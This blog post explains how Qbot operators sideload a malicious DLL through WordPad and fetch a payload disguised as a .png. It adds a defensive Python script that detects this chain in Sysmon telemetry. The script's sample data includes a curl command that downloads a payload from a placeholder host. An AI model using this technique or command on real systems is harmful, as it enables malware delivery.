Qbot operators using malicious DLLs to hijack WordPad on Windows systems
In the ever-evolving landscape of cyber threats, hostile actors keep finding new ways into computer systems and new ways to exploit sensitive data. One such example is the Qbot operation, whose operators use a malicious DLL to hijack the WordPad editor that ships with Windows.
Because the malicious code runs inside a trusted Microsoft program, the technique helps the attackers evade detection while they carry out the rest of the intrusion. In this blog post, we look at how Qbot operators turn WordPad into a covert loader.
Threat actors abuse DLL loading in Windows 10 WordPad
According to researchers, attackers have started abusing the way WordPad, the text editor preinstalled on Windows 10, loads its DLLs in order to distribute the Qbot malware. ProxyLife, a member of Cryptolaemus and a cybersecurity researcher, recently uncovered an email campaign in which the attackers distribute a copy of the WordPad executable together with a malicious DLL.
When WordPad starts, the Windows loader resolves the DLLs it imports. Under the default DLL search order, the directory the executable was launched from is checked before System32, so if a file with an expected DLL name sits next to WordPad, the loader maps that file and runs its entry point (DllMain) without checking that it is the genuine library. Only DLLs on the KnownDLLs list are always taken from System32 and are immune to this; any other library an application loads by name can be replaced this way.
What is DLL Hijacking
The technique is known as "DLL search-order hijacking", or "DLL sideloading" when, as here, the attacker ships the legitimate signed binary together with the malicious DLL so the two land in the same folder. It is nothing new: attackers were previously observed using the Windows Calculator app for the same purpose.
In this case, once WordPad loads the malicious DLL, the DLL runs curl.exe, a legitimate download tool that lives in the System32 folder, to fetch a second DLL whose file name ends in .png. The file is not an image: it is Qbot (also known as QakBot), a long-running banking trojan that, among other things, steals emails for use in phishing attacks and downloads additional payloads such as Cobalt Strike.
Using WordPad to evade detection
By having legitimate, Microsoft-signed programs like WordPad or Calculator load their malicious DLLs, the threat actors get their code running inside a process that antivirus, application allowlisting and reputation-based controls tend to trust, which helps them stay hidden for the rest of the attack.
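As an added example (not code from this post or from the researchers it cites), the following Python sketch turns the chain above into three checks an analyst could run over endpoint telemetry: a Windows-shipped binary such as WordPad loading an unsigned DLL from its own, non-system directory (the search-order hijack); WordPad spawning curl.exe (the download stage); and a file named .png whose bytes are actually a PE image (the disguised payload). The event records are constructed here in the shape of Sysmon Event ID 7 (ImageLoad) and Event ID 1 (ProcessCreate); the paths, the helper.dll name, the URL and the choice to match processes by file name are assumptions of the example, not details from the campaign.

```python
"""Detection sketch for the WordPad DLL-sideloading chain (added example, constructed input)."""
import ntpath
import struct

# Directories where Windows' own DLLs legitimately live.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# Windows-shipped programs the post names as sideload hosts (WordPad, Calculator).
# Matching the process on file name is an assumption of this example.
HOST_BINARIES = {"wordpad.exe", "write.exe", "calc.exe"}
DOWNLOADERS = {"curl.exe"}  # the built-in downloader the chain relies on
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def _dir(path):
    return ntpath.dirname(path).lower().rstrip("\\")


def in_system_dir(path):
    d = _dir(path)
    return any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def is_sideload(ev):
    """Event 7: a host binary loads a non-Microsoft-signed DLL from the directory it
    was launched from, and that directory is not a system directory. That is the
    search-order hijack: the application directory is searched before System32."""
    if ev.get("EventID") != 7:
        return False
    proc, dll = ev["Image"], ev["ImageLoaded"]
    if ntpath.basename(proc).lower() not in HOST_BINARIES:
        return False
    if not dll.lower().endswith(".dll") or in_system_dir(dll):
        return False
    ms_signed = ev.get("Signed") == "true" and ev.get("Signature", "").startswith("Microsoft")
    return _dir(dll) == _dir(proc) and not ms_signed


def is_host_spawning_downloader(ev):
    """Event 1: WordPad or Calculator starting curl.exe, which the post says the
    sideloaded DLL does to fetch Qbot. OriginalFileName comes from the PE version
    resource, so the match survives curl.exe being renamed on disk."""
    if ev.get("EventID") != 1:
        return False
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    child = ntpath.basename(ev.get("Image", "")).lower()
    orig = ev.get("OriginalFileName", "").lower()
    return parent in HOST_BINARIES and (child in DOWNLOADERS or orig in DOWNLOADERS)


def is_pe(data):
    """True if data is a PE image: 'MZ' DOS header and the PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def disguised_pe(name, data):
    """The payload was a DLL 'disguised as a PNG': judge the bytes, not the name."""
    return name.lower().endswith(".png") and not data.startswith(PNG_MAGIC) and is_pe(data)


def triage(events):
    """Return (event index, rule name) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if is_sideload(ev):
            hits.append((i, "sideload"))
        if is_host_spawning_downloader(ev):
            hits.append((i, "host-spawns-downloader"))
    return hits


def fake_pe():
    """Constructed minimal PE: DOS header whose e_lfanew points at the PE signature at 0x80."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    return bytes(hdr) + b"PE\x00\x00" + bytes(20)


# Constructed telemetry: a sideload, a benign load, curl spawned by WordPad, curl from a shell.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\bob\Downloads\wordpad.exe",
     "ImageLoaded": r"C:\Users\bob\Downloads\helper.dll", "Signed": "false", "Signature": ""},
    {"EventID": 7, "Image": r"C:\Program Files\Windows NT\Accessories\wordpad.exe",
     "ImageLoaded": r"C:\Windows\System32\user32.dll", "Signed": "true",
     "Signature": "Microsoft Windows"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Users\bob\Downloads\wordpad.exe",
     "CommandLine": r"curl.exe -o %TEMP%\img.png http://bad.invalid/img.png"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl.exe https://example.com"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))               # [(0, 'sideload'), (2, 'host-spawns-downloader')]
    print(disguised_pe("img.png", fake_pe()))  # True
```

The weak point is the file-name match on the host process: an attacker can rename the copied wordpad.exe, and Sysmon's ImageLoad record carries signature data only for the loaded DLL, not for the loading process. In production, key the sideload rule on the process's Event ID 1 record (same ProcessGuid), whose OriginalFileName comes from the PE version resource and survives renaming, and treat any Microsoft-signed executable loading a non-Microsoft DLL from its own non-system directory as suspect rather than maintaining a list of host names.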
It's worth noting that this particular chain depends on curl.exe, which Microsoft only began shipping with Windows 10; earlier versions of the operating system do not have it preinstalled, so the download stage only works on Windows 10 and newer.
Even so, with older versions at or nearing the end of their support and users moving to Windows 10 and 11, this limitation offers little respite.
According to recent reports from BleepingComputer, the Qbot operation has switched to other infection methods in the weeks since, a reminder that the threat actors behind Qbot keep rotating their delivery tactics to evade detection and improve their success rate.
As cybercriminals evolve their strategies, it becomes increasingly crucial for individuals and organizations to stay vigilant and employ robust cybersecurity measures to protect against emerging threats.